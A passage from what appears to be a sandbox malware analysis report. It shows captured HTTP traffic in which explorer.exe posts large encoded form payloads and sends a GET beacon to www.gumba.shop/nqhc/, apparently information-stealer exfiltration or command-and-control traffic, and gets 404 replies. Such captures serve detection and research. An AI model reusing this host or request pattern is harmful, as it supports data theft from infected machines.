                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 62 35 45 6f 6a 53 30 4d 33 56 43 42 41 76 69 6c 47 74 6b 37 72 4f 5a 4c 52 43 33 30 59 79 51 6a 59 68 66 75 61 5a 36 4c 4f 58 35 46 53 44 69 41 64 59 38 5f 38 65 65 73 4f 4f 44 2d 6e 35 41 34 6b 6b 51 35 74 6c 55 36 37 79 43 30 42 2d 41 42 39 56 56 78 65 31 53 73 38 77 72 65 39 4d 7e 5f 4a 35 6e 4a 73 36 33 4d 34 4d 4d 41 73 36 54 6a 52 5f 58 6a 49 76 33 6a 7a 48 69 69 7e 47 6a 64 4c 7a 51 71 44 63 73 5f 42 6d 55 50 6f 77 4a 2d 4a 2d 75 43 38 47 4e 36 79 62 34 65 54 46 39 56 49 6e 4b 2d 68 47 57 4b 77 7a 54 5f 31 70 67 6c 38 72 79 62 28 36 35 5f 41 73 54 6b 6e 73 69 32 76 32 6d 72 57 5f 73 37 79 57 6f 67 70 56 69 5a 67 65 34 33 30 37 41 31 68 72 73 79 31 51 78 71 55 41 73 4c 39 6b 65 2d 28 6d 7a 61 46 70 72 33 6a 30 50 74 64 79 56 4a 6c 62 67 34 7e 4f 55 7a 57 61 4b 43 38 46 70 53 58 48 55 4b 41 42 32 59 4c 65 6c 41 57 6c 69 44 6c 46 6c 6a 6b 36 76 31 39 72 76 74 64 51 66 6e 4d 65 4f 69 49 4e 57 6a 4d 5f 38 6c 74 63 47 50 4f 4c 48 7a 50 75 30 72 47 66 30 30 61 47 61 6a 7a 46 62 4d 6f 75 72 34 4e 6a 45 35 41 45 55 68 37 68 28 33 74 62 6b 39 6f 49 7a 78 6d 75 79 6f 49 30 34 34 54 2d 77 71 6d 4e 49 61 45 54 53 33 4d 76 71 4c 51 7a 74 51 37 67 61 57 6d 63 4b 4c 6c 74 39 45 63 39 7a 7a 4f 43 4e 79 4d 4c 56 39 4b 47 33 32 31 4b 74 48 75 74 72 38 5a 5a 6d 34 38 42 35 53 75 71 47 65 79 69 4e 30 49 6c 6a 58 68 79 6a 73 34 69 57 64 44 57 36 47 74 41 4a 64 53 39 6b 68 44 46 72 7a 62 44 53 57 38 31 39 49 6a 74 6b 66 48 65 75 6e 62 51 72 71 4b 37 4f 32 52 2d 53 41 53 48 4f 5a 64 41 7e 48 50 4a 79 5f 70 34 63 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=S6tbconk9Vd-b5EojS0M3VCBAvilGtk7rOZLRC30YyQjYhfuaZ6LOX5FSDiAdY8_8eesOOD-n5A4kkQ5tlU67yC0B-AB9VVxe1Ss8wre9M~_J5nJs63M4MMAs6TjR_XjIv3jzHii~GjdLzQqDcs_BmUPowJ-J-uC8GN6yb4eTF9VInK-hGWKwzT_1pgl8ryb(65_AsTknsi2v2mrW_s7yWogpViZge4307A1hrsy1QxqUAsL9ke-(mzaFpr3j0PtdyVJlbg4~OUzWaKC8FpSXHUKAB2YLelAWliDlFljk6v19rvtdQfnMeOiINWjM_8ltcGPOLHzPu0rGf00aGajzFbMour4NjE5AEUh7h(3tbk9oIzxmuyoI044T-wqmNIaETS3MvqLQztQ7gaWmcKLlt9Ec9zzOCNyMLV9KG321KtHutr8ZZm48B5SuqGeyiN0IljXhyjs4iWdDW6GtAJdS9khDFrzbDSW819IjtkfHeunbQrqK7O2R-SASHOZdA~HPJy_p4c.
                                                                                                                                                                                    Nov 21, 2022 19:24:37.180026054 CET1841INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:37 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 153
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Server: nginx/1.16.1
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    74192.168.11.20499003.13.90.7680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:39.204737902 CET1846OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gumba.shop
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gumba.shop
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 62 35 45 6f 6a 53 30 4d 33 56 43 42 41 76 69 6c 47 74 6b 37 72 4f 5a 4c 52 43 33 30 59 79 59 6a 5a 55 4c 75 62 36 69 4c 66 6e 35 46 4d 54 69 46 64 59 38 59 38 65 33 6b 4f 4f 50 78 6e 5f 4d 34 6b 7a 30 35 74 58 4d 36 7e 79 43 33 66 4f 41 44 32 31 55 74 65 31 4f 34 38 30 48 4f 39 38 61 5f 62 72 76 4a 7e 5a 50 50 67 4d 4d 43 73 36 54 76 56 5f 58 72 49 76 37 4e 7a 48 75 69 7e 45 58 64 4b 43 73 71 42 72 59 5f 5a 47 55 4d 69 51 4a 37 65 75 76 36 38 47 59 4a 79 62 34 4f 54 45 35 56 49 67 65 2d 67 48 57 4c 7e 7a 54 5f 32 70 67 6d 34 72 75 66 28 36 6b 71 41 73 33 6b 6e 72 6d 32 7e 6d 6d 72 48 71 41 38 6b 6d 6f 6d 7e 6c 6a 66 6b 65 38 5f 30 37 46 47 68 70 41 79 32 67 4e 71 56 7a 30 4c 75 56 65 2d 6a 57 7a 59 4a 35 72 6f 32 45 4f 70 64 78 39 7a 6c 62 42 4e 7e 4e 59 7a 58 37 47 43 35 6e 4e 54 52 6e 55 4d 4d 68 32 4a 41 2d 34 50 57 68 47 66 6c 46 6c 7a 6b 34 44 31 36 62 66 74 63 53 6e 6b 50 4f 4f 6c 45 74 58 37 48 66 77 6a 74 63 71 48 4f 4b 50 6a 50 74 59 72 55 76 30 30 52 41 54 31 39 31 62 50 71 75 72 51 41 44 46 5f 41 45 51 4c 37 6c 6e 6e 74 4c 59 39 70 35 44 78 33 75 79 6e 4f 55 34 38 5a 65 77 6f 69 4e 49 61 45 54 66 47 4d 76 6d 4c 51 43 46 51 35 54 79 57 32 61 43 4c 6e 74 39 34 63 39 7a 59 4f 43 52 5f 4d 4c 64 66 4b 47 47 62 31 50 64 48 33 5a 50 38 59 62 4f 37 33 68 35 74 6b 4b 47 33 32 6a 77 79 49 6c 28 6c 68 79 7a 57 34 52 53 64 43 57 71 47 28 77 4a 65 58 64 6b 71 55 31 72 6c 4d 54 65 30 38 78 6b 39 6a 73 67 70 48 65 47 6e 66 47 43 75 50 5f 4b 41 49 4e 44 70 53 42 53 71 64 57 32 32 4b 4e 4f 59 71 65 71 2d 4d 4b 78 44 31 34 42 65 58 43 4d 37 6a 45 49 41 65 59 51 4f 41 7a 41 53 59 49 68 32 44 72 58 4e 64 56 32 73 49 6c 61 75 6b 73 35 37 5a 78 33 63 53 42 4f 5a 41 62 4c 6b 6d 4d 4a 53 39 5f 34 30 78 4a 54 72 75 79 6d 64 71 78 32 48 4f 43 41 55 55 39 39 7a 57 53 31 2d 6d 49 70 52 39 61 58 5a 44 63 59 4e 6a 72 4b 4d 38 58 6a 68 73 55 6c 67 46 71 30 6b 7a 53 4f 46 47 56 4a 5f 68 6a 59 79 44 53 6f 4d 52 68 36 77 64 53 54 4e 59 47 41 65 79 63 6d 56 56 70 45 5f 6f 36 6b 46 6d 6f 38 43 76 5f 38 30 35 5a 33 33 70 39 6d 68 67 67 49 64 42 6c 41 56 65 62 6e 44 42 77 70 6f 41 46 67 56 58 2d 75 74 33 42 57 4a 5a 2d 6f 6e 6a 64 50 35 38 6e 55 52 79 73 54 53 66 4f 4b 56 36 4a 77 68 67 64 63 70 65 49 46 6b 61 37 34 6a 36 2d 57 5a 64 6f 70 71 28 41 43 4f 53 57 5a 6e 6e 51 51 6e 50 66 46 50 6b 4d 28 51 63 4d 4a 64 57 2d 76 56 74 72 68 31 54 61 6c 51 44 38 72 79 49 32 36 37 33 45 54 6f 28 77 64 59 74 69 46 48 41 79 58 4e 31 6d 71 56 78 6c 69 46 74 71 51 55 4f 31 74 54 78 2d 35 4e 35 73 55 6b 42 4f 62 4e 4f 67 46 33 7e 61 57 61 50 6e 65 58 58 6a 72 6d 70 4c 65 68 4f 49 37 4b 71 58 46 44 39 74 71 6e 74 56 28 74 56 77 56 31 6e 72 28 5a 7e 6e 39 33 73 73 37 45 37 35 6f 56 4b 56 79 59 71 38 30 52 53 52 66 63 67 73 66 44 33 4d 31 44 78 44 34 4a 70 6b 38 37 46 48 52 2d 53 4e 76 2d 37 34 32 41 48 47 4c 62 45 44 34 74 46 4a 4f 47 4a 5a 38 68 48 31 4d 4b 58 52 76 69 30 52 57 31 46 48 54 4e 71 41 53 4d 28 70 58 67 51 36 43 52 45 75 4a 6b 79 38 74 61 30 6f 70 72 71 61 46 5f 5a 44 41 62 7a 59 30 6d 5a 74 77 5f 39 5a 5a 45 4d 51 52 68 51 71 6a 53 37 50 67 64 38 65 58 56 4b 77 78 68 6e 4d 79 4d 4b 75 45 62 4f 78 59 74 33 75 6e 44 72 53 58 6d 55 74 66 41 78 63 4a 32 65 54 68 32 32 6d 53 6f 4c 63 43 39 31 65 57 47 59 63 74 37 72 64 35 61 6d 63 53 6b 65 39 41 74 56 65 31 39 66 44 6d 33 31 34 4d 43 4b 66 6d 5f 48 54 67 65 52 6b 47 52 4f 43 67 6b 59 57 63 4e 56 68 50 72 48 45 73 48 39 49 69 33 79 62 57 47 56 74 4c 4e 54 57 41 68 45 39 70 68 47 67 5a 77 64 6e 77 62 6d 4d 71 6a 41 77 4e 75 35 78 7a 4e 38 2d 28 48 33 62 70 67 51 74 62 37 49 77 65 73 70 4f 4e 31 7e 48 79 56 38 34 68 65 7e 38 31 50 28 61 67 4e 31 38 78 37 4c 6e 65 48 59 2d 4d 36 71 59 7a 77 44 67 51 6f 78 79 39 2d 67 31 42 2d 63 6f 49 68 70 79 34 54 59 42 73 56 66 6e 63 42 77 74 72 77 53 43 6c 6d 72 68 39 64 42 54 31 79 68 74 45 46 47 71 4c 74 61 79 78 35 75 39 54 43 4a 67 4c 79 37 55 31 70 34 58 59 4c 31 6d 31 6f 6c 44 6c 68 36 78 36 2d 56 4f 4a 4d 53 53 5a 51 4f 35 76 72 28 53 43 47 55 68 30 4e 65 6a 47 45 68 31 59 68 72 30 35 78 34 44 59 4e 57
                                                                                                                                                                                    Data Ascii: r4txB=S6tbconk9Vd-b5EojS0M3VCBAvilGtk7rOZLRC30YyYjZULub6iLfn5FMTiFdY8Y8e3kOOPxn_M4kz05tXM6~yC3fOAD21Ute1O480HO98a_brvJ~ZPPgMMCs6TvV_XrIv7NzHui~EXdKCsqBrY_ZGUMiQJ7euv68GYJyb4OTE5VIge-gHWL~zT_2pgm4ruf(6kqAs3knrm2~mmrHqA8kmom~ljfke8_07FGhpAy2gNqVz0LuVe-jWzYJ5ro2EOpdx9zlbBN~NYzX7GC5nNTRnUMMh2JA-4PWhGflFlzk4D16bftcSnkPOOlEtX7HfwjtcqHOKPjPtYrUv00RAT191bPqurQADF_AEQL7lnntLY9p5Dx3uynOU48ZewoiNIaETfGMvmLQCFQ5TyW2aCLnt94c9zYOCR_MLdfKGGb1PdH3ZP8YbO73h5tkKG32jwyIl(lhyzW4RSdCWqG(wJeXdkqU1rlMTe08xk9jsgpHeGnfGCuP_KAINDpSBSqdW22KNOYqeq-MKxD14BeXCM7jEIAeYQOAzASYIh2DrXNdV2sIlauks57Zx3cSBOZAbLkmMJS9_40xJTruymdqx2HOCAUU99zWS1-mIpR9aXZDcYNjrKM8XjhsUlgFq0kzSOFGVJ_hjYyDSoMRh6wdSTNYGAeycmVVpE_o6kFmo8Cv_805Z33p9mhggIdBlAVebnDBwpoAFgVX-ut3BWJZ-onjdP58nURysTSfOKV6JwhgdcpeIFka74j6-WZdopq(ACOSWZnnQQnPfFPkM(QcMJdW-vVtrh1TalQD8ryI2673ETo(wdYtiFHAyXN1mqVxliFtqQUO1tTx-5N5sUkBObNOgF3~aWaPneXXjrmpLehOI7KqXFD9tqntV(tVwV1nr(Z~n93ss7E75oVKVyYq80RSRfcgsfD3M1DxD4Jpk87FHR-SNv-742AHGLbED4tFJOGJZ8hH1MKXRvi0RW1FHTNqASM(pXgQ6CREuJky8ta0oprqaF_ZDAbzY0mZtw_9ZZEMQRhQqjS7Pgd8eXVKwxhnMyMKuEbOxYt3unDrSXmUtfAxcJ2eTh22mSoLcC91eWGYct7rd5amcSke9AtVe19fDm314MCKfm_HTgeRkGROCgkYWcNVhPrHEsH9Ii3ybWGVtLNTWAhE9phGgZwdnwbmMqjAwNu5xzN8-(H3bpgQtb7IwespON1~HyV84he~81P(agN18x7LneHY-M6qYzwDgQoxy9-g1B-coIhpy4TYBsVfncBwtrwSClmrh9dBT1yhtEFGqLtayx5u9TCJgLy7U1p4XYL1m1olDlh6x6-VOJMSSZQO5vr(SCGUh0NejGEh1Yhr05x4DYNWCqmmFUKNtY1tVr4HA9O(nutFLhEgNcCi-pwyqQvVct1xvpcYw~ie8N-CqlYRpAdhsax24h20kmX81Ml68bRXnVjbCa8K4kK7s7Ff0TyTp3hQwiG3kcMYFaLcl(u4R(tgG9AEqJ9pz4ed1xGG2bRvhOK7qJWnwAqJsSQmuwmnl9TvczbkeOnFAPmwPa9otIWDQGT7Xr0nv27m9aTy0fHkh9jvwtmFn4L5mhz1X4BqJ3lbpKWGOJW9YF_~oiB~ZmYy22HuBlzPAVaAGBrRsXlPth9JdGfYNO6LPmlGCvd3NHbD5gVy1dvKT0SYe4bvYebQBz07OVRF3f9rPHzDxBUOvpK6evoeiSXB2OR00wZlrR1UkZmrIr31grp~t(cavGJkSoREUixFZMndUKWeHOS9QzlACUc40rZG5Wwi_mVi939yAykCXvuQNoGn_PxsKU27_5IA6aEu0n9dfBhKoEYM0Y9EdMCoof74scIJwMxLIm3eZO2G8i8I0v1KJySb2IydbH2uR94JdcK75nToPgzfYH7yjDxOo83UeiP~l8I5jln59jvSLkuvyRxKKzEo9jGjtExRuXKGtD01mx_3ld190Q5d41-u9SEhUuxWXfng6SmQVGw9WjSBj0_2AHOG5XbgNX7V506FfQxrZZlkMYqjzzseDfIS-WLmRFRudhEKL~2PtP2Z4egUapnjyZJWgREZtpaTzWlSPaJn65BCmt6~fpI(PJVLYQk8bk_jKBk5R9lu10ss5ZHRWfOpxFMiLdaxrbOU0QU3WZ_ufTbe2jVgubXtvvVbwn2UDAHjcL75Bwyf2nNqfmgK3wd~nhv127yNZF7i0e2et63AUfWpeXzh-QN~wlHWp(7ZlQnFBglPV7akZwDZbsj(PrNJhefVaK_dG(3l_nHN9NC2CQhTihBJRQOofgbhE19IpPoFJu_ERRR2FNyt_s3WBW6ho1A1vr9Q3Y0CEQnGWKJhUofNUzV83c97r1CxvcgrZjDk_gY4eSqWkrps2lwFmMKyzqGmU6wYudnj6kUwhWarCVTQnlUSCFJ24k_kBbHw8D8(vBwcDc57iTgF_5cAx8ttTRN9T~fPUSat15cXG2y5b8GYguZl9vrCoQuI-xjyadelBLNgj~TQNKL6isJcPW3~vS0WOzBhmRXCbN_pp63C_KhboHvysZdZuj-Shsw1cMQDOXwP7NRN6ye0rgXOwKp599kBs537t41hTNu1ZmMOzjeTefjwNJ490S2mN6l6i2u9c0BuNO_fodkpgs6QdAa73y7EPCalTTfAggt9GwcVH~g9vJprlDknlutHIzWG4pwJegSjit-CgRcmW~h7EJcnYQaKSCWafqjsIA0Zs(g9i5vo_4aCF6YpJGGuLsE9g7MD3VF0EsYBNa5LZdD(FCLivb5jdpUDawLI3tqDe2EE_O8mDcTTlkqT_AOANg0XQthHwdEXMZI5VIpL28SmPpM7VYHTY4Y5bKaoshhwYWXaH6a7lxKgMt54CuXJy(_kTYUCvL0PC8t7dF0JOGQUhtLMEpWV77T1MjUC8~i~CiIAdAyhjSOgOSrBMbwtB(FDrwoAm93BL7g8JzVVbuZ9GWU6wS3SrvfSmpk9PQ353yL2sv2A6xwI_vhDSHbhMza0wGI0FNrfmrPP4OrVNPT1-KhYeTgg_IlufiJa-HCQ8PXRiOaLYBhA3OeYQpsdzxmUOi5wvPs3ZLdMro1mulZuOA17u4bW89dcMczapLUbqWINUWj2NYB9-utRZOAOWtxB36Zf3DMiMIjFLmiu1bQMbQo0-a-jWtzg2tgbHiLH2rNYAtvm873CaPpI-AAzcus0MrNDqmYllSapxG28298(AUmrxw9qP6BaIEXP8bpC3wXGA7phJrLlTSMdZacMJLgR8qMU9Hzy_lHSeJNO87_S9nXZB3W87VVRzryrS5YDo0mJwkr(Lh-8p4VO6MIHQdt8IlzcQqCgKy-S0(ichG9sSs36l4eh6YtWkmUBvHjj-DfjVUFnc19hgAqKn3xGg2UrfTcxFvFLrsVck~wcihjPhglr0s4xh0nn3MZ29mxa6RHLAIWlFhrgbxWSYoAe0psNBwcksLxug9m5KN0msuUc7YMSTdDXMdyGzriUjwXJ3(Y2zkBTsmmJAQWv9r6l1ihE2EbmMk74sw8VIkvR9wiCW7FuZlp9DMpGj(URL0BP24alRKIzMv5tVpWFXOtGQV00tjPjgVXU0qLUT4XXUXOfxZtMY2rztLKcHFiaNtAWnt0~tqK0GnLTheV~i55KOolbZuJLqyrqG(qRylnJxMrLBedu2oeaF0cbc2VrxpCjww6NGSZNbMh8zBkGzUFiKRzvoFJR_8WXMwbwkc9JAV-Ppft0VdCOwEHkkztDqXpX8dLNJOBWgkVFIQNaTuwE_yoii91lWMzsC2yJwACm4C6EqnJKeNwcd4A1JVkaOer4ca5NkkgM_nJgC3OVL9SvfaFrlCL6fiagmGWQ_3CQmPa(vW1BGN3eMISQpJzoV8AIdw3vqBqXriXJlRKMBMNeVRbSx1H0nF2yUiNQwLR3NbYKXcFWtZMWUs3UZsOP0Kb2Q0rUOZmDOoXJh0wwr7GrB~uBtnJiGzwwbzw~y0L8WLE4NyZvOSLwyudXaBu1Xr-FK5NYNuUF5wQQuZ36gHaMmBo1mpGR65P3TGA5vJzJtUIZ3NgxLHq2xrHSeJ-rhUofzyunaZiU_1Mp7e_h0gl2gG0xaTT
                                                                                                                                                                                    Nov 21, 2022 19:24:39.204828024 CET1854OUTData Raw: 4c 77 38 77 44 76 53 30 5a 70 45 47 33 48 58 74 32 4c 66 46 47 38 50 59 64 5a 76 6d 69 65 72 37 42 41 78 64 36 59 58 33 4e 67 63 6c 59 46 36 79 67 4d 32 59 76 72 56 74 66 34 4e 50 73 62 57 36 49 4f 50 46 78 37 30 73 76 6e 54 32 6b 45 38 46 77 58
                                                                                                                                                                                    Data Ascii: Lw8wDvS0ZpEG3HXt2LfFG8PYdZvmier7BAxd6YX3NgclYF6ygM2YvrVtf4NPsbW6IOPFx70svnT2kE8FwXbmDxD74MmNSBNDIUKdC8spu2mIWHa5pqtNeAfEHli0mdVVeNdf6aI6DC2s1osQcdIVyf8V2b9q4qvWpJ4GPaPUgYzzxc(oQUW1znso0jrkW5zNKmmg6JmARpQEnl~Cnu3dH4It~e05kDw-AZe4V4GdNODF5RyCS8Y
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351722956 CET1857OUTData Raw: 59 64 79 4c 7e 38 48 77 66 47 79 63 6b 57 6a 35 7a 57 75 72 34 62 6e 6c 47 45 47 78 64 4f 35 43 78 6f 72 62 5a 63 34 4d 61 6a 50 54 6b 54 38 42 65 33 78 68 41 35 64 79 72 79 77 54 28 4c 5a 36 6e 59 48 34 36 61 59 49 70 45 7a 4a 6f 4b 6d 65 78 79
                                                                                                                                                                                    Data Ascii: YdyL~8HwfGyckWj5zWur4bnlGEGxdO5CxorbZc4MajPTkT8Be3xhA5dyrywT(LZ6nYH46aYIpEzJoKmexy7NWUJKoCeAWaf8BpR4WsZ-iUxYtbufmwoq0WA2IuRyfjtgYrzJmIKZBTYlv0C7cLINUWWYPKOhcqLOMcSRJ2scrBrsoVIkbPNR93k3WuoZF4HAWFfvzy6XfB~b99uwByn_w-PZgbzxi03eOF2h1H3eYgC7z8Uk2Ek
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351834059 CET1861OUTData Raw: 6c 77 79 63 77 77 49 31 66 50 32 56 30 53 4d 56 45 52 28 45 72 34 64 55 70 79 45 4c 6b 49 6b 32 54 4a 63 55 48 69 4a 41 70 75 55 50 7a 76 76 77 4b 31 53 4d 6c 49 7e 4a 6c 46 52 78 48 31 35 59 4a 52 7e 41 48 64 56 33 74 6a 47 66 52 63 54 35 49 55
                                                                                                                                                                                    Data Ascii: lwycwwI1fP2V0SMVER(Er4dUpyELkIk2TJcUHiJApuUPzvvwK1SMlI~JlFRxH15YJR~AHdV3tjGfRcT5IU39ORLa8L0Jwk~Nncrv5oQpChc7eeYbeyfOo8JGv_Cazo9ML4PQK5XJFGN3JY(sc16kx5AxF6C0JDSIctjba2gsrTRhqWo6ya7fot7NAISEg3~iJbcxiTPMATod9etoCqn1TNrRwfs85bPbo4vV77viVSx28MsNcNp
                                                                                                                                                                                    Nov 21, 2022 19:24:39.351898909 CET1865OUTData Raw: 45 38 7a 52 41 59 50 58 6e 6a 59 4b 4e 65 7e 4c 64 6b 79 76 62 56 4f 4a 54 54 73 35 57 59 69 4a 70 58 45 4b 54 4a 4f 68 33 38 6b 43 52 36 56 41 4b 55 58 4d 66 6c 59 46 4c 48 64 6f 71 50 73 63 56 48 69 6c 77 48 61 58 37 39 41 58 67 6a 63 48 57 4c
                                                                                                                                                                                    Data Ascii: E8zRAYPXnjYKNe~LdkyvbVOJTTs5WYiJpXEKTJOh38kCR6VAKUXMflYFLHdoqPscVHilwHaX79AXgjcHWL4q1J(EHqBk55Mc7pYdKXCp~hBWUL09qASp487AhkhC10i9x86OF8k0f9o5iPnNeD~HFsiclr(WrdiPLw2gvkyLTFpcVu1DTafnjjtH~QnXtHVU~Mz2gaR72vwKAhSoQjJT7T4Tg3l-5hacrzkEnjZd7FusrEKRHg6
                                                                                                                                                                                    Nov 21, 2022 19:24:39.352123022 CET1872OUTData Raw: 73 6b 64 5a 73 49 4e 65 4e 6f 35 49 6e 74 50 5a 68 6d 34 43 62 6a 56 45 5a 59 47 46 65 51 47 70 53 67 28 30 6b 4f 7a 41 63 71 7e 68 55 62 72 76 63 32 67 77 6b 71 58 67 73 34 47 37 6f 5f 72 76 45 55 4b 69 69 51 49 7a 55 32 75 63 57 32 39 70 39 79
                                                                                                                                                                                    Data Ascii: skdZsINeNo5IntPZhm4CbjVEZYGFeQGpSg(0kOzAcq~hUbrvc2gwkqXgs4G7o_rvEUKiiQIzU2ucW29p9yD8GJRsgFzgaoINAj2ixuIGfOdJaL(ziTn2pIMEfdxaW6lL~FPY1yFTNGV6zgNbwhERe-1ZILi-DPnTDKLMW6oZYxVgC3xA0lE5fbOoeFu91nUaTLv3wF9emM49XFeaL6rL4xIdzt3ThxJA3dlFvHM-4pE_iw7MfIl
                                                                                                                                                                                    Nov 21, 2022 19:24:39.352221966 CET1873INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:39 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 153
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Server: nginx/1.16.1
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
                                                                                                                                                                                    Nov 21, 2022 19:24:39.352236032 CET1880OUTData Raw: 43 30 6d 65 78 30 70 48 35 4b 36 6c 56 4b 39 6e 46 4d 39 67 41 4c 6d 32 7a 68 6e 37 53 6f 4b 71 34 6e 4c 76 65 51 6c 62 75 72 6e 71 62 5a 6a 51 7e 38 72 6a 4c 79 76 56 39 42 79 70 6f 5a 7e 62 7e 45 75 38 51 5f 30 63 71 48 45 79 66 63 64 43 47 63
                                                                                                                                                                                    Data Ascii: C0mex0pH5K6lVK9nFM9gALm2zhn7SoKq4nLveQlburnqbZjQ~8rjLyvV9BypoZ~b~Eu8Q_0cqHEyfcdCGcKxEicJd4rQ1jwz43bGsZsPM2ubRUYN7240SMPrVpdd~Zv9mkb3vNKx79JHS36zx5Em9oewRvFjAGpVnT0j0-3_QVKZ9hdEt3~ofOE2Q6CQQsKv4OOiA2aPb68UUfmmt1L7LWeIjwzEFP8ZKKOkxwNuDdaNESDYnTV
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499022961 CET1887OUTData Raw: 36 6f 63 77 37 65 79 68 53 6b 31 6d 71 70 7a 6b 78 6c 77 7a 79 5f 61 52 32 33 5a 65 47 33 49 31 65 75 45 76 52 6e 45 76 6b 6e 62 64 4b 59 46 44 62 57 35 55 6d 32 62 35 46 62 43 67 79 63 6e 61 54 52 5a 74 74 4a 79 47 49 48 74 78 45 74 45 4d 4c 66
                                                                                                                                                                                    Data Ascii: 6ocw7eyhSk1mqpzkxlwzy_aR23ZeG3I1euEvRnEvknbdKYFDbW5Um2b5FbCgycnaTRZttJyGIHtxEtEMLf6xEOtz(MmrrnC1o34zWIK_u4lm71wr8SLtsjhiyL~y(d8RHeZnvLF2LjDaJIRWVOK8rldgeDYY3cyry_zstJiIJfDS4D5YprFOGKD0ZfqRE51eeyMmNit46dWr55Qq2RMf3SvD6yEqsWIPMfI7p8ZAA9XcFAXqWZ8
                                                                                                                                                                                    Nov 21, 2022 19:24:39.499121904 CET1894OUTData Raw: 54 6a 54 34 66 6c 50 58 34 48 76 38 61 34 6c 2d 52 47 37 4a 77 70 4f 78 72 34 42 42 74 6a 69 70 44 7a 71 34 54 41 6a 48 32 42 45 6e 68 38 68 45 4f 33 36 55 48 63 54 4f 57 4a 77 51 6a 36 71 79 30 73 7a 4a 61 62 33 35 76 66 32 6c 74 4e 42 44 44 65
                                                                                                                                                                                    Data Ascii: TjT4flPX4Hv8a4l-RG7JwpOxr4BBtjipDzq4TAjH2BEnh8hEO36UHcTOWJwQj6qy0szJab35vf2ltNBDDe7B2K7c(o4Q7JaK3xdA3nc954~Lvqf0j4WuBOGi46CVsjGMfLs06xrtC19sY5Y18d4omHsYNEv1uA7FhI4jLcG1Lh9PubYHNS0qIxmuZXlFmvubkHto0-92kX7ekMKipGOivem9oYeXWMuMkU1CCYhzHXNfXn4IRyx


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    75192.168.11.20499013.13.90.7680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:41.375164986 CET1895OUTGET /nqhc/?r4txB=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.gumba.shop
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:24:41.522042036 CET1895INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:41 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 153
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Server: nginx/1.20.1
